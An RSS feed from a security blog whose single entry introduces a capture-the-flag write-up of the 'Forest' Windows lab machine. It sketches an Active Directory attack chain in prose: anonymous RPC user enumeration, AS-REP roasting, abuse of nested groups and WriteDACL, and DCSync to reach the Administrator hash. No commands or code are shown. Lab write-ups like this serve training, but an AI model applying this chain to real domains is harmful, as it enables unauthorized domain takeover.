<?xml version="1.0" encoding="utf-8" standalone="yes"?>
<rss version="2.0" xmlns:atom="http://www.w3.org/2005/Atom">
  <channel>
    <title>Dcsync on appl3b0y</title>
    <link>https://appl3b0y.com/tags/dcsync/</link>
    <description>Recent content in Dcsync on appl3b0y</description>
    <generator>Hugo</generator>
    <language>en-us</language>
    <lastBuildDate>Tue, 23 Jun 2026 00:00:00 +0000</lastBuildDate>
    <atom:link href="https://appl3b0y.com/tags/dcsync/index.xml" rel="self" type="application/rss+xml" />
    <item>
      <title>Forest</title>
      <link>https://appl3b0y.com/writeups/forest/</link>
      <pubDate>Tue, 23 Jun 2026 00:00:00 +0000</pubDate>
      <guid>https://appl3b0y.com/writeups/forest/</guid>
      <description>&lt;h2 id=&#34;introduction&#34;&gt;Introduction&lt;/h2&gt;&#xA;&lt;p&gt;&lt;strong&gt;Forest&lt;/strong&gt; is an easy Windows machine, but it is easy only if you already speak Active Directory. There is no web app, no CVE, no memory corruption. The whole box is a chain of AD misconfigurations that you unlock by reading enumeration output and by trusting what BloodHound draws for you.&lt;/p&gt;&#xA;&lt;p&gt;The path looks like this: the domain controller allows an &lt;strong&gt;anonymous RPC session&lt;/strong&gt;, which leaks the full list of domain users. One of those users, &lt;code&gt;svc-alfresco&lt;/code&gt;, has Kerberos &lt;strong&gt;pre-authentication disabled&lt;/strong&gt;, so we AS-REP roast his hash and crack it offline. That shell drops us into a domain where &lt;code&gt;svc-alfresco&lt;/code&gt; sits (through nested groups) inside &lt;strong&gt;Account Operators&lt;/strong&gt;, giving him control over the &lt;strong&gt;Exchange Windows Permissions&lt;/strong&gt; group. That group holds &lt;strong&gt;WriteDACL&lt;/strong&gt; over the domain object, which is the textbook road to &lt;strong&gt;DCSync&lt;/strong&gt; and, from there, the Administrator hash.&lt;/p&gt;</description>
    </item>
  </channel>
</rss>
